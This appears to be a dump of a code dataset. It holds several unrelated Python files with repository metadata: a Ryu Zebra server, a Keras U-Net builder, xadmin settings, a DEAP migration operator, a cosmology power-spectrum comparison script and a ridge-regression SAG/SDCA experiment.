# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Zebra Server corresponding to 'zserv' structure.
"""
import contextlib
import logging
import os
import socket
import struct
import netaddr
from ryu import cfg
from ryu.base import app_manager
from ryu.base.app_manager import RyuApp
from ryu.controller.handler import set_ev_cls
from ryu.lib import hub
from ryu.lib.packet import zebra
from ryu.services.protocols.zebra import db
from ryu.services.protocols.zebra import event
from ryu.services.protocols.zebra.server import event as zserver_event
LOG = logging.getLogger(__name__)
CONF = cfg.CONF['zapi']
GLOBAL_CONF = cfg.CONF
# Session to database of Zebra protocol service
SESSION = db.Session()
class ZClient(object):
"""
Zebra client class.
"""
def __init__(self, server, sock, addr):
self.server = server
self.sock = sock
self.addr = addr
self.logger = server.logger
self.is_active = False
self._threads = []
self.send_q = hub.Queue(16)
# Zebra protocol version
self.zserv_ver = CONF.server_version
# Zebra route type distributed by client (not initialized yet)
self.route_type = None
def start(self):
self.is_active = True
self.sock.settimeout(GLOBAL_CONF.socket_timeout)
self._threads.append(hub.spawn(self._send_loop))
self._threads.append(hub.spawn(self._recv_loop))
self.server.send_event_to_observers(
zserver_event.EventZClientConnected(self))
hub.joinall(self._threads)
self.server.send_event_to_observers(
zserver_event.EventZClientDisconnected(self))
def stop(self):
self.is_active = False
def _send_loop(self):
try:
while self.is_active:
buf = self.send_q.get()
self.sock.sendall(buf)
except socket.error as e:
self.logger.exception(
'Error while sending message to Zebra client%s: %s',
self.addr, e)
self.stop()
def _recv_loop(self):
buf = b''
min_len = recv_len = zebra.ZebraMessage.get_header_size(
self.zserv_ver)
try:
while self.is_active:
try:
recv_buf = self.sock.recv(recv_len)
except socket.timeout:
continue
if len(recv_buf) == 0:
break
buf += recv_buf
while len(buf) >= min_len:
(length,) = struct.unpack_from('!H', buf)
if (length - len(buf)) > 0:
# Need to receive remaining data
recv_len = length - len(buf)
break
msg, _, buf = zebra.ZebraMessage.parser(buf)
ev = event.message_to_event(self, msg)
if ev:
self.logger.debug('Notify event: %s', ev)
self.server.send_event_to_observers(ev)
except socket.error as e:
self.logger.exception(
'Error while sending message to Zebra client%s: %s',
self.addr, e)
self.stop()
def send_msg(self, msg):
"""
Sends Zebra message.
:param msg: Instance of py:class: `ryu.lib.packet.zebra.ZebraMessage`.
:return: Serialized msg if succeeded, otherwise None.
"""
if not self.is_active:
self.logger.debug(
'Cannot send message: Already deactivated: msg=%s', msg)
return
elif not self.send_q:
self.logger.debug(
'Cannot send message: Send queue does not exist: msg=%s', msg)
return
elif self.zserv_ver != msg.version:
self.logger.debug(
'Zebra protocol version mismatch:'
'server_version=%d, msg.version=%d',
self.zserv_ver, msg.version)
msg.version = self.zserv_ver # fixup
self.send_q.put(msg.serialize())
def zclient_connection_factory(sock, addr):
LOG.debug('Connected from client: %s: %s', addr, sock)
zserv = app_manager.lookup_service_brick(ZServer.__name__)
with contextlib.closing(ZClient(zserv, sock, addr)) as zclient:
try:
zclient.start()
except Exception as e:
LOG.error('Error in client%s: %s', addr, e)
raise e
def detect_address_family(host):
if netaddr.valid_ipv4(host):
return socket.AF_INET
elif netaddr.valid_ipv6(host):
return socket.AF_INET6
elif os.path.isdir(os.path.dirname(host)):
return socket.AF_UNIX
else:
return None
class ZServer(RyuApp):
"""
The base class for Zebra server application.
"""
_EVENTS = event.ZEBRA_EVENTS + [
zserver_event.EventZClientConnected,
zserver_event.EventZClientDisconnected,
]
def __init__(self, *args, **kwargs):
super(ZServer, self).__init__(*args, **kwargs)
self.zserv = None
self.zserv_addr = (CONF.server_host, CONF.server_port)
self.zapi_connection_family = detect_address_family(CONF.server_host)
# Initial Router ID for Zebra server
self.router_id = CONF.router_id
def start(self):
super(ZServer, self).start()
if self.zapi_connection_family == socket.AF_UNIX:
unix_sock_dir = os.path.dirname(CONF.server_host)
# Makes sure the unix socket does not already exist
if os.path.exists(CONF.server_host):
os.remove(CONF.server_host)
if not os.path.isdir(unix_sock_dir):
os.mkdir(unix_sock_dir)
os.chmod(unix_sock_dir, 0o777)
try:
self.zserv = hub.StreamServer(
self.zserv_addr, zclient_connection_factory)
except OSError as e:
self.logger.error(
'Cannot start Zebra server%s: %s', self.zserv_addr, e)
raise e
if self.zapi_connection_family == socket.AF_UNIX:
os.chmod(CONF.server_host, 0o777)
self._add_lo_interface()
return hub.spawn(self.zserv.serve_forever)
def _add_lo_interface(self):
intf = db.interface.ip_link_add(SESSION, 'lo')
if intf:
self.logger.debug('Added interface "%s": %s', intf.ifname, intf)
route = db.route.ip_route_add(
SESSION,
destination='127.0.0.0/8',
device='lo',
source='127.0.0.1/8',
route_type=zebra.ZEBRA_ROUTE_CONNECT)
if route:
self.logger.debug(
'Added route to "%s": %s', route.destination, route)
@set_ev_cls(event.EventZebraHello)
def _hello_handler(self, ev):
if ev.body is None:
self.logger.debug('Client %s says hello.', ev.zclient)
return
# Set distributed route_type to ZClient
ev.zclient.route_type = ev.body.route_type
self.logger.debug(
'Client %s says hello and bids fair to announce only %s routes',
ev.zclient, ev.body.route_type)
@set_ev_cls(event.EventZebraRouterIDAdd)
def _router_id_add_handler(self, ev):
self.logger.debug(
'Client %s requests router_id, server will response: router_id=%s',
ev.zclient, self.router_id)
# Send ZEBRA_ROUTER_ID_UPDATE for response
msg = zebra.ZebraMessage(
body=zebra.ZebraRouterIDUpdate(
family=socket.AF_INET,
prefix='%s/32' % self.router_id))
ev.zclient.send_msg(msg)
@set_ev_cls(event.EventZebraInterfaceAdd)
def _interface_add_handler(self, ev):
self.logger.debug('Client %s requested all interfaces', ev.zclient)
interfaces = db.interface.ip_address_show_all(SESSION)
self.logger.debug('Server will response interfaces: %s', interfaces)
for intf in interfaces:
msg = zebra.ZebraMessage(
body=zebra.ZebraInterfaceAdd(
ifname=intf.ifname,
ifindex=intf.ifindex,
status=intf.status,
if_flags=intf.flags,
metric=intf.metric,
ifmtu=intf.ifmtu,
ifmtu6=intf.ifmtu6,
bandwidth=intf.bandwidth,
ll_type=intf.ll_type,
hw_addr=intf.hw_addr))
ev.zclient.send_msg(msg)
routes = db.route.ip_route_show_all(
SESSION, ifindex=intf.ifindex, is_selected=True)
self.logger.debug('Server will response routes: %s', routes)
for route in routes:
dest, _ = route.destination.split('/')
msg = zebra.ZebraMessage(
body=zebra.ZebraInterfaceAddressAdd(
ifindex=intf.ifindex,
ifc_flags=0,
family=None,
prefix=route.source,
dest=dest))
ev.zclient.send_msg(msg)
@set_ev_cls([event.EventZebraIPv4RouteAdd,
event.EventZebraIPv6RouteAdd])
def _ip_route_add_handler(self, ev):
self.logger.debug(
'Client %s advertised IP route: %s', ev.zclient, ev.body)
for nexthop in ev.body.nexthops:
route = db.route.ip_route_add(
SESSION,
destination=ev.body.prefix,
gateway=nexthop.addr,
ifindex=nexthop.ifindex or 0,
route_type=ev.body.route_type)
if route:
self.logger.debug(
'Added route to "%s": %s', route.destination, route)
@set_ev_cls([event.EventZebraIPv4RouteDelete,
event.EventZebraIPv6RouteDelete])
def _ip_route_delete_handler(self, ev):
self.logger.debug(
'Client %s withdrew IP route: %s', ev.zclient, ev.body)
for nexthop in ev.body.nexthops:
routes = db.route.ip_route_delete(
SESSION,
destination=ev.body.prefix,
gateway=nexthop.addr,
route_type=ev.body.route_type)
if routes:
self.logger.debug(
'Deleted routes to "%s": %s', ev.body.prefix, routes)
| [
"[email protected]"
]
| |
771f88b1dd03b5d6e62b5589304c1a9ea8911b90 | 0e1e643e864bcb96cf06f14f4cb559b034e114d0 | /Exps_7_v3/Basic_Pyramid_1ch_model_for_import_BN/pyr_1s/L3/step09_1side_L3.py | 58b490c9fdcdf4bd6b952ed9edb68970d1693d28 | []
| no_license | KongBOy/kong_model2 | 33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307 | 1af20b168ffccf0d5293a393a40a9fa9519410b2 | refs/heads/master | 2022-10-14T03:09:22.543998 | 2022-10-06T11:33:42 | 2022-10-06T11:33:42 | 242,080,692 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,874 | py | #############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### 把 kong_model2 加入 sys.path
import os
from tkinter import S
code_exe_path = os.path.realpath(__file__) ### 目前執行 step10_b.py 的 path
code_exe_path_element = code_exe_path.split("\\") ### 把 path 切分 等等 要找出 kong_model 在第幾層
kong_layer = code_exe_path_element.index("kong_model2") ### 找出 kong_model2 在第幾層
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1]) ### 定位出 kong_model2 的 dir
import sys ### 把 kong_model2 加入 sys.path
sys.path.append(kong_model2_dir)
# print(__file__.split("\\")[-1])
# print(" code_exe_path:", code_exe_path)
# print(" code_exe_path_element:", code_exe_path_element)
# print(" kong_layer:", kong_layer)
# print(" kong_model2_dir:", kong_model2_dir)
#############################################################################################################################################################################################################
from step08_b_use_G_generate_I_to_M import I_to_M
from step08_b_use_G_generate_0_util import Tight_crop
from step09_c_train_step import Train_step_I_to_M
from step09_d_KModel_builder_combine_step789 import KModel_builder, MODEL_NAME
import time
start_time = time.time()
###############################################################################################################################################################################################
###############################################################################################################################################################################################
########################################################### Block1
### Block1
#########################################################################################
pyramid_1side_1 = [1, 0, 0, 0, 0, 0, 1]
pyramid_1side_2 = [1, 1, 0, 0, 0, 1, 1]
pyramid_1side_3 = [1, 1, 1, 0, 1, 1, 1]
pyramid_1side_4 = [1, 1, 1, 1, 1, 1, 1]
#########################################################################################
ch032_pyramid_1side_1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(norm="bn", out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch= 32, depth_level=3, out_ch=1, unet_acti="sigmoid", conv_block_num=pyramid_1side_1, ch_upper_bound= 2 ** 14)
ch032_pyramid_1side_2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(norm="bn", out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch= 32, depth_level=3, out_ch=1, unet_acti="sigmoid", conv_block_num=pyramid_1side_2, ch_upper_bound= 2 ** 14)
ch032_pyramid_1side_3 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(norm="bn", out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch= 32, depth_level=3, out_ch=1, unet_acti="sigmoid", conv_block_num=pyramid_1side_3, ch_upper_bound= 2 ** 14)
ch032_pyramid_1side_4 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(norm="bn", out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch= 32, depth_level=3, out_ch=1, unet_acti="sigmoid", conv_block_num=pyramid_1side_4, ch_upper_bound= 2 ** 14)
#########################################################################################
###############################################################################################################################################################################################
if(__name__ == "__main__"):
import numpy as np
print("build_model cost time:", time.time() - start_time)
data = np.zeros(shape=(1, 511, 511, 1))
use_model = ch032_pyramid_1side_4
use_model = use_model.build()
result = use_model.generator(data)
print(result.shape)
import tensorflow as tf
import datetime
code_exe_dir = "\\".join(code_exe_path_element[:-1])
log_dir = f"{code_exe_dir}/use_Tensorboard_see_Graph/{datetime.datetime.now().strftime('%Y%m%d-%H%M%S')}"
tboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir)
img_inputs = tf.keras.Input(shape=(511, 511, 1))
use_model.generator(img_inputs)
use_model.generator.compile(optimizer='adam', loss='mae', metrics=['accuracy'])
use_model.generator.fit (data, data, epochs=1, callbacks=[tboard_callback])
print(f"tensorboard --logdir={log_dir}")
| [
"[email protected]"
]
| |
556b47ee9741e6478e72dc7ba357d7f7214ecc55 | f6de805e4e0e169cd82562aca20bfef3b38c8c31 | /apps/users/adminx.py | ed82ab401d80dc903fe1250af5de075c40fee0fa | []
| no_license | Huangkai1008/stuonline | 742ac9b27ea1cda8e2c35bf0425cb076ff0345dc | f874eeeb91433d7d789783347e4ffbb01198da58 | refs/heads/master | 2022-10-26T03:36:40.910069 | 2018-01-08T05:41:15 | 2018-01-08T05:41:29 | 114,594,601 | 0 | 1 | null | 2022-10-18T01:01:58 | 2017-12-18T04:05:32 | Python | UTF-8 | Python | false | false | 1,005 | py | # coding:utf8
import xadmin
from xadmin import views
from .models import EmailVerifyRecord, Banner
class BaseSetting(object):
"""
xadmin全局配置
"""
enable_themes = True
use_bootswatch = True
class GlobalSetting(object):
site_title = "Mooc后台管理系统"
site_footer = "mooc在线"
menu_style = "accordion"
class EmailVerifyRecordAdmin(object):
list_display = ['code', 'email', 'send_type', 'send_time']
search_fields = ['code', 'email', 'send_type']
list_filter = ['code', 'email', 'send_type', 'send_time']
class BannerAdmin(object):
list_display = ['title', 'image', 'url', 'index', 'add_time']
search_fields = ['title', 'image', 'url', 'index']
list_filter = ['title', 'image', 'url', 'index', 'add_time']
xadmin.site.register(EmailVerifyRecord, EmailVerifyRecordAdmin)
xadmin.site.register(Banner, BannerAdmin)
xadmin.site.register(views.BaseAdminView, BaseSetting)
xadmin.site.register(views.CommAdminView, GlobalSetting)
| [
"[email protected]"
]
| |
e40c6d6f5675fdbe0d83e5a15f777af2e4f5f6e6 | 13a32b92b1ba8ffb07e810dcc8ccdf1b8b1671ab | /home--tommy--mypy/mypy/lib/python2.7/site-packages/deap/tools/migration.py | c5c5a598b606788966662c951ee1599f7c6f8ab9 | [
"Unlicense"
]
| permissive | tommybutler/mlearnpy2 | 8ec52bcd03208c9771d8d02ede8eaa91a95bda30 | 9e5d377d0242ac5eb1e82a357e6701095a8ca1ff | refs/heads/master | 2022-10-24T23:30:18.705329 | 2022-10-17T15:41:37 | 2022-10-17T15:41:37 | 118,529,175 | 0 | 2 | Unlicense | 2022-10-15T23:32:18 | 2018-01-22T23:27:10 | Python | UTF-8 | Python | false | false | 2,764 | py | from __future__ import division
def migRing(populations, k, selection, replacement=None, migarray=None):
"""Perform a ring migration between the *populations*. The migration first
select *k* emigrants from each population using the specified *selection*
operator and then replace *k* individuals from the associated population
in the *migarray* by the emigrants. If no *replacement* operator is
specified, the immigrants will replace the emigrants of the population,
otherwise, the immigrants will replace the individuals selected by the
*replacement* operator. The migration array, if provided, shall contain
each population's index once and only once. If no migration array is
provided, it defaults to a serial ring migration (1 -- 2 -- ... -- n --
1). Selection and replacement function are called using the signature
``selection(populations[i], k)`` and ``replacement(populations[i], k)``.
It is important to note that the replacement strategy must select *k*
**different** individuals. For example, using a traditional tournament for
replacement strategy will thus give undesirable effects, two individuals
will most likely try to enter the same slot.
:param populations: A list of (sub-)populations on which to operate
migration.
:param k: The number of individuals to migrate.
:param selection: The function to use for selection.
:param replacement: The function to use to select which individuals will
be replaced. If :obj:`None` (default) the individuals
that leave the population are directly replaced.
:param migarray: A list of indices indicating where the individuals from
a particular position in the list goes. This defaults
to a ring migration.
"""
nbr_demes = len(populations)
if migarray is None:
migarray = range(1, nbr_demes) + [0]
immigrants = [[] for i in xrange(nbr_demes)]
emigrants = [[] for i in xrange(nbr_demes)]
for from_deme in xrange(nbr_demes):
emigrants[from_deme].extend(selection(populations[from_deme], k))
if replacement is None:
# If no replacement strategy is selected, replace those who migrate
immigrants[from_deme] = emigrants[from_deme]
else:
# Else select those who will be replaced
immigrants[from_deme].extend(replacement(populations[from_deme], k))
for from_deme, to_deme in enumerate(migarray):
for i, immigrant in enumerate(immigrants[to_deme]):
indx = populations[to_deme].index(immigrant)
populations[to_deme][indx] = emigrants[from_deme][i]
__all__ = ['migRing'] | [
"[email protected]"
]
| |
8a9780c347a8c98f84d292c41a1fb0567cb89ea7 | 607241e619ca499121106b218a5e00ac5244bda3 | /analysis/plot_power_spectrum_ch_hydro_MPI_enzo.py | 047f5abbf4b31835cfaf40243969c97d0465bc6b | []
| no_license | bvillasen/cosmo_sims | 37caea950c7be0626a5170333bfe734071c58124 | 8b20dc05842a22ea50ceb3d646037d2e66fc8c9b | refs/heads/master | 2020-04-22T23:22:28.670894 | 2020-01-02T23:32:39 | 2020-01-02T23:32:39 | 114,167,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,135 | py | import sys
import numpy as np
import matplotlib.pyplot as plt
import h5py as h5
from power_spectrum import get_power_spectrum
dev_dir = '/home/bruno/Desktop/Dropbox/Developer/'
cosmo_dir = dev_dir + 'cosmo_sims/'
toolsDirectory = cosmo_dir + "tools/"
sys.path.extend([toolsDirectory ] )
from load_data_cholla import load_snapshot_data
from load_data_enzo import load_snapshot_enzo
from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
# dataDir = '/home/bruno/Desktop/data/'
dataDir = '/raid/bruno/data/'
outputsDir = '/home/bruno/cholla/scale_output_files/'
eta = 0.030
beta = 0.25
nPoints = 256
Lbox = 50.0 #Mpc/h
data_name = data_name = 'SIMPLE_PPMP_eta0.035_beta0.00_grav4_clean'
# dataSet = 'PLMP'
enzoDir = dataDir + 'cosmo_sims/enzo/{0}_hydro_50Mpc_HLLC_grav4/h5_files/'.format(nPoints )
# chollaDir = dataDir + 'cosmo_sims/cholla_pm/{1}_hydro_50Mpc/data_enzo_{2}_eta{0:.3f}/'.format( eta, nPoints, reconst )
chollaDir = dataDir + 'cosmo_sims/cholla_pm/{1}_hydro_50Mpc/data_{0}/'.format( data_name, nPoints, )
outDir = dev_dir + 'figures/power_hydro/'
# fileName = outDir + 'ps_{0}_hydro_enzo_{2}_eta{1:.3f}.png'.format( nPoints, eta, reconst )
# set simulation volume dimentions
nz, ny, nx = nPoints, nPoints, nPoints
nCells = nx*ny*nz
h = 0.6766
Lx = Lbox
Ly = Lbox
Lz = Lbox
dx, dy, dz = Lx/(nx), Ly/(ny), Lz/(nz )
n_kSamples = 12
redshift_list = [ 100, 70, 40, 10, 7, 4, 1, 0.6, 0.3, 0 ]
redshift_list.reverse()
outputs_enzo = np.loadtxt( outputsDir + 'outputs_hydro_enzo_256_50Mpc_HLLC_grav4.txt')
z_enzo = 1./(outputs_enzo) - 1
snapshots_enzo = []
for z in redshift_list:
z_diff_enzo = np.abs( z_enzo - z )
index_enzo = np.where( z_diff_enzo == z_diff_enzo.min())[0][0]
snapshots_enzo.append( index_enzo )
snapshots = snapshots_enzo
# #For 128 50Mpc
# # snapshots = [ 0, 2, 4, 7, 10, 13, 16, 22, 24, 27]
#
# # snapshots = [ 0, 2, 4, 7, 10, 13, 16, 20, 25, 30]
#
# # snapshots = [ 0, 2, 4, 7, 10, 13, 16, 20, 24, 38]
# # snapshots = [ 0, 2, 4, 7, 10, 13, 16, 19]
# # snapshots = [ 0, 2, 4]
# n_snapshots = len( snapshots )
n_snapshots = len(snapshots)
if rank >= n_snapshots: exit()
nSnap = snapshots[rank]
n_power_data = 4
ps_all = np.ones( [n_power_data, n_kSamples] )
# ps_all *= rank
print " Cholla: ", nSnap
snapKey = str( nSnap )
# if i not in [9]: continue
data_cholla = load_snapshot_data( snapKey, chollaDir, cool=False, single_file=False )
current_z_ch = data_cholla['current_z']
dens_dm_cholla = data_cholla['dm']['density'][...]
dens_gas_cholla = data_cholla['gas']['density'][...]
ps_dm_cholla, k_vals, count_dm_cholla = get_power_spectrum( dens_dm_cholla, Lbox, nx, ny, nz, dx, dy, dz, n_kSamples=n_kSamples)
ps_gas_cholla, k_vals, count_gas_cholla = get_power_spectrum( dens_gas_cholla, Lbox, nx, ny, nz, dx, dy, dz, n_kSamples=n_kSamples)
ps_all[0] = ps_dm_cholla
ps_all[1] = ps_gas_cholla
print ' Enzo: ', nSnap
data_enzo = load_snapshot_enzo( nSnap, enzoDir, dm=True, cool=False)
current_a_enzo = data_enzo['current_a']
current_z_enzo = data_enzo['current_z']
dens_dm_enzo = data_enzo['dm']['density'][...]
dens_gas_enzo = data_enzo['gas']['density'][...]
ps_dm_enzo, k_vals, count_dm_enzo = get_power_spectrum( dens_dm_enzo, Lbox, nx, ny, nz, dx, dy, dz, n_kSamples=n_kSamples)
ps_gas_enzo, k_vals, count_gas_enzo = get_power_spectrum( dens_gas_enzo, Lbox, nx, ny, nz, dx, dy, dz, n_kSamples=n_kSamples)
ps_all[2] = ps_dm_enzo
ps_all[3] = ps_gas_enzo
send_buf = ps_all
recv_buf = None
if rank == 0:
recv_buf = np.empty ([ n_snapshots, n_power_data, n_kSamples], dtype=np.float64)
comm.Gather(send_buf, recv_buf, root=0)
data_all = recv_buf
send_buf = np.array([current_z_ch])
recv_buf = None
if rank == 0:
recv_buf = np.empty ([ n_snapshots ], dtype=np.float64)
comm.Gather(send_buf, recv_buf, root=0)
current_z_all = recv_buf
if rank != 0: exit()
# print data_all
# print current_z_all
fig = plt.figure(0)
fig.set_size_inches(20,10)
fig.clf()
gs = plt.GridSpec(5, 2)
gs.update(hspace=0.05, wspace=0.08, )
ax1 = plt.subplot(gs[0:4, 0])
ax2 = plt.subplot(gs[4:5, 0])
ax3 = plt.subplot(gs[0:4, 1])
ax4 = plt.subplot(gs[4:5, 1])
# colors = ['b', 'y', 'g', 'c', 'm', 'b', 'y', 'g', 'c', 'm', ]
colors = ['C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9']
for i in range(n_snapshots):
ps_dm_cholla = data_all[i,0]
ps_gas_cholla = data_all[i,1]
ps_dm_enzo = data_all[i,2]
ps_gas_enzo = data_all[i,3]
label = 'z = {0:.1f}'.format(current_z_all[i])
c = colors[i]
if i == 0:
ax1.plot( k_vals, ps_dm_enzo, '--', c=c, linewidth=1, label='Enzo' )
ax3.plot( k_vals, ps_gas_enzo, '--', c=c, linewidth=1, label='Enzo' )
else:
ax1.plot( k_vals, ps_dm_enzo, '--', c=c, linewidth=1 )
ax3.plot( k_vals, ps_gas_enzo, '--', c=c, linewidth=1 )
#
ax1.plot( k_vals, ps_dm_cholla, c=c, linewidth=2, label=label )
ax3.plot( k_vals, ps_gas_cholla, c=c, linewidth=2, label=label )
error_dm = (ps_dm_cholla - ps_dm_enzo) / ps_dm_enzo
error_gas = (ps_gas_cholla - ps_gas_enzo) / ps_gas_enzo
ax2.plot( k_vals, error_dm , c=c, alpha=0.9)
ax4.plot( k_vals, error_gas , c=c, alpha=0.9)
ax2.axhline( y=0., color='r', linestyle='--', )
ax2.set_ylim( -1, 1)
ax4.axhline( y=0., color='r', linestyle='--', )
ax4.set_ylim( -1, 1)
ax1.set_ylabel( r'$P(k) $', fontsize=17)
ax2.set_ylabel( 'Difference', fontsize=15)
ax1.legend( loc=3)
ax2.set_xlabel( r'$k \, \, [h Mpc^{-1}]$', fontsize=17)
ax3.legend( loc=3)
ax2.set_xlabel( r'$k \, \, [h Mpc^{-1}]$', fontsize=17)
ax4.set_xlabel( r'$k \, \, [h Mpc^{-1}]$', fontsize=17)
ax1.set_xscale('log')
ax1.set_yscale('log')
ax3.set_xscale('log')
ax3.set_yscale('log')
ax2.set_xscale('log')
ax4.set_xscale('log')
ax1.set_title('DM Power Spectrum', fontsize=18)
ax3.set_title('Gas Power Spectrum ', fontsize=18)
data_name = data_name = 'SIMPLE_PPMP_eta0.005_beta0.00_grav4'
fig.suptitle(r' {0} '.format(data_name), fontsize=20, y=0.95)
fileName = outDir + 'ps_{0}_hydro_enzo_{1}.png'.format( nPoints, data_name )
# ax1.xlim()
fig.savefig( fileName, pad_inches=0.1, bbox_inches='tight', dpi=80)
print 'Saved Image: ', fileName
| [
"[email protected]"
]
| |
ae3fc09f862ea7e2d30971709cad0a4ea02cc83f | e84a9b9bf1398f0e78a63ea3c5d50a5263165301 | /ridge.py | 07f327e9bd03ad145265355c94531c53c7a508ba | []
| no_license | theovincent/SAG_vs_SDCA | 6289f8ae90c8db5bc734cc76b362c7d329bd8d06 | 827614d3ef6bbd2355a53ff745879a887e23d5d8 | refs/heads/master | 2022-06-26T10:15:19.746976 | 2020-05-10T12:43:34 | 2020-05-10T12:43:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,355 | py | from pathlib import Path
import numpy as np
import matplotlib.pyplot as plt
# For the data
from src.utils.preprocess import get_houses_data
# For sag method
from src.sag.train_sag import sag_train
from src.sag.test_sag import sag_test
import src.sag.loss.squared_loss as square_sag
from src.sag.accuracy.regression_acc import regression_acc as acc_sag
from src.sag.visualisation.regression_visu import regression_visu as visu_sag
# For sdca method
from src.sdca.train_sdca import sdca_train
from src.sdca.test_sdca import sdca_test
from src.sdca.kernel.polynomial import polynomial_kernel
from src.sdca.kernel.gaussian import gaussian_kernel
from src.sdca.loss.square_loss import square_loss as square_sdca
from src.sdca.steps.square_step import square_step as step_sdca
from src.sdca.accuracy.regression_acc import regression_acc as acc_sdca
from src.sdca.visualisation.sdca_visu import sdca_visu
YOU_WANT_SAG = False
YOU_WANT_SDCA = True
# -- Set the options --
ADD_BIAS = True
POLY_KERNEL = False
# --- Get the data ---
CSV_PATH = Path("data/data.csv")
(ALL_TRAINS, ALL_VALIDS, ALL_TESTS, PRICES_TRAIN, PRICES_VALID, PRICES_TEST, LIST_PREPROCESS) = get_houses_data(CSV_PATH)
# --- SAG ---
# Set the functions, the options and the parameters
FUNCTIONS_SAG = [square_sag, acc_sag, visu_sag]
OPTIONS = [ADD_BIAS, False, False] # [ADD_BIAS, VISUALISATION, SHOW_PLOTS]
PARAM_SAG = np.array([[0.00007, 0.0003], [0.07, 0.3]]) # [LAMBDA, ETA]
if YOU_WANT_SAG:
# -- Training --
print("Train the sag...")
NB_TRAININGS = len(ALL_TRAINS)
ACCURACIES = np.zeros(NB_TRAININGS)
ACCURACY_MAX = 0
LAMBDA_OPT = 0
ETA_OPT = 0
IDX_TRY_OPT = None
for idx_try in range(NB_TRAININGS):
print(LIST_PREPROCESS[idx_try])
# Training with the parameters
RESULTS_SAG = sag_train(ALL_TRAINS[idx_try], PRICES_TRAIN, ALL_VALIDS[idx_try], PRICES_VALID, FUNCTIONS_SAG,
OPTIONS, PARAM_SAG)
(ACCURACY_VALID, LAMBDA, ETA) = RESULTS_SAG
# Update the global parameters
ACCURACIES[idx_try] = ACCURACY_VALID
print("Validation accuracy", ACCURACY_VALID)
if ACCURACY_MAX < ACCURACY_VALID:
ACCURACY_MAX = ACCURACY_VALID
LAMBDA_OPT = LAMBDA
ETA_OPT = ETA
IDX_TRY_OPT = idx_try
# -- Testing with the best parameters --
print("Test the sag...")
PARAMETERS = [ADD_BIAS, LAMBDA_OPT, ETA_OPT]
ACCURACY_TEST = sag_test(ALL_TRAINS[IDX_TRY_OPT], PRICES_TRAIN, ALL_TESTS[IDX_TRY_OPT], PRICES_TEST, square_sag,
acc_sag, PARAMETERS)
print("The accuracy for the test set is :", ACCURACY_TEST)
print("It was made with the preprocessing :", LIST_PREPROCESS[IDX_TRY_OPT])
print("The optimal value of lambda is :", LAMBDA_OPT)
print("The optimal value of eta is :", ETA_OPT)
# Plot the losses
plt.figure()
plt.bar(np.arange(0, NB_TRAININGS, 1), ACCURACIES)
plt.xlabel("Different preprocessing")
plt.ylabel("Validation accuracy")
plt.show()
# --- SDCA ---
# Set the kernel parameters and the functions
if POLY_KERNEL:
KERNEL = polynomial_kernel
else:
KERNEL = gaussian_kernel
FUNCTIONS_SDCA = [square_sdca, step_sdca, POLY_KERNEL, KERNEL, acc_sdca]
# Set the range of the parameters for the optimisation : box, degree or gamma
if POLY_KERNEL:
PARAM_SDCA = np.array([[0.1, 3], [1, 5]])
else:
PARAM_SDCA = np.array([[5, 10], [0.005, 0.009]]) # [BOX, GAMMA]
VISU_SDCA = [False, False, sdca_visu, None, None] # [SHOW_PLOTS, SHOW_VISU, VISUALISATION, POINTS, VALUES]
if YOU_WANT_SDCA:
# -- Training --
print("Train the sdca...")
NB_TRAININGS = len(ALL_TRAINS)
ACCURACIES = np.zeros(NB_TRAININGS)
ACCURACY_MAX = 0
BOX_OPT = 0
PARAM_OPT = 0
IDX_TRY_OPT = None
for idx_try in range(NB_TRAININGS):
print(LIST_PREPROCESS[idx_try])
# Training with the parameters
RESULTS_SDCA = sdca_train(ALL_TRAINS[idx_try], PRICES_TRAIN, ALL_VALIDS[idx_try], PRICES_VALID, FUNCTIONS_SDCA,
VISU_SDCA, PARAM_SDCA)
(ACCURACY_VALID, BOX, KERNEL_PARAM) = RESULTS_SDCA
# Update the global parameters
ACCURACIES[idx_try] = ACCURACY_VALID
print("Validation accuracy", ACCURACY_VALID)
if ACCURACY_MAX < ACCURACY_VALID:
ACCURACY_MAX = ACCURACY_VALID
BOX_OPT = BOX
PARAM_OPT = KERNEL_PARAM
IDX_TRY_OPT = idx_try
# -- Testing with the best parameters --
print("Test the sdca...")
PARAMETERS = [BOX_OPT, PARAM_OPT]
ACCURACY_TEST = sdca_test(ALL_TRAINS[IDX_TRY_OPT], PRICES_TRAIN, ALL_TESTS[IDX_TRY_OPT], PRICES_TEST,
FUNCTIONS_SDCA, PARAMETERS)
print("The accuracy for the test set is :", ACCURACY_TEST)
print("It was made with the preprocessing :", LIST_PREPROCESS[IDX_TRY_OPT])
print("The optimal value of the box is :", BOX_OPT)
if POLY_KERNEL:
print("The optimal degree of the polynomial kernel is :", PARAM_OPT)
else:
print("The optimal gamma of the gaussian kernel is :", PARAM_OPT)
# Plot the losses
plt.figure()
plt.bar(np.arange(0, NB_TRAININGS, 1), ACCURACIES)
plt.xlabel("Different preprocessing")
plt.ylabel("Validation accuracy")
plt.show()
| [
"[email protected]"
]
| |
349c0e8015ac58454cfde9a9351ad0e72ba789e7 | d02508f5ebbbdb4ba939ba830a8e8d9abc69774a | /Array/combinationSum.py | 3162ed77fd98c7e3440de32e89a479d00c864026 | []
